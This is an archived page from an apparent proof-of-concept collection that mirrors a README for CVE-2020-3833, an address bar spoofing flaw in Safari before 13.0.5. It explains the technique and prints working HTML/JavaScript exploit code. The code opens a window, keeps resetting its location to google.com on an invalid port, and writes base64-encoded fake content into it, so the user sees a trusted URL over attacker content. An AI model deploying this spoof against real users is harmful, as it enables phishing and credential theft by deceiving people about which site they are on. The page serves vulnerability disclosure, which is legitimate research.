Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2020-3833 PoC — Apple Safari 安全漏洞

Source
Associated Vulnerability
Title:Apple Safari 安全漏洞 (CVE-2020-3833)
Description:Apple Safari是美国苹果(Apple)公司的一款Web浏览器,是Mac OS X和iOS操作系统附带的默认浏览器。 Apple Safari 13.0.5之前版本中存在安全漏洞。攻击者可借助恶意的网站利用该漏洞伪造地址栏内容。
Readme
# Safari Address Bar Spoof (CVE-2020-3833)

In browsers, an address bar represents the current web address.

## Address bar spoof vulnerability 

It is an ability to keep legit URL in the address bar while loading the content from other domain. This makes the user believe that the content is served by a legit domain. For example, the browser is displaying https://www.google.com in the address bar or Omni-box while rendering the content from https://www.evil.com

The basics idea to find such vulnerabilities is to first initiate the javascript call and then interrupt it. 

## Proof of concept code
```
<html>
    <head>
        <title>Address Bar Spoof!</title>
    </head>
    <body>
        <script>
            function demo() {
            var evilPage = 'PGh0bWw+Cjx0aXRsZT4KZ29vZ2xlLmNvbQo8L3RpdGxlPgo8Ym9keT4KPGgzPkFkZHJlc3MgQmFyIFNwb29mIC1AQzBkM0czM2s8L2gzPgo8L2JvZHk+CjwvaHRtbD4=';
                var x = window.open('','');
                setInterval(function(){x.location.replace('https://www.google.com:8080');});
                x.document.write(atob(evilPage));
            }
        </script>
        <button onclick="demo();">test</button>
    </body>
</html>
```

Here first we invoked a window.open() method and then we changed the location of that window to invalid port URL and right after we write into the DOM using document.write() method. Since we provided an invalid port URL browser will keep displaying it while displaying the content from attackers domain. we can achieve 30+ seconds spoof using this vulnerability 

## Video demonsttation

![poc](https://github.com/c0d3G33k/Safari-Adress-Bar-Spoof-CVE-2020-3833-/blob/master/Safari-address-bar-spoof.gif)
File Snapshot

[4.0K] /data/pocs/463f3f8ae8fb08ae04c6ac7e68bbd565d9e528f0 ├── [1.7K] README.md └── [1.9M] Safari-address-bar-spoof.gif 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.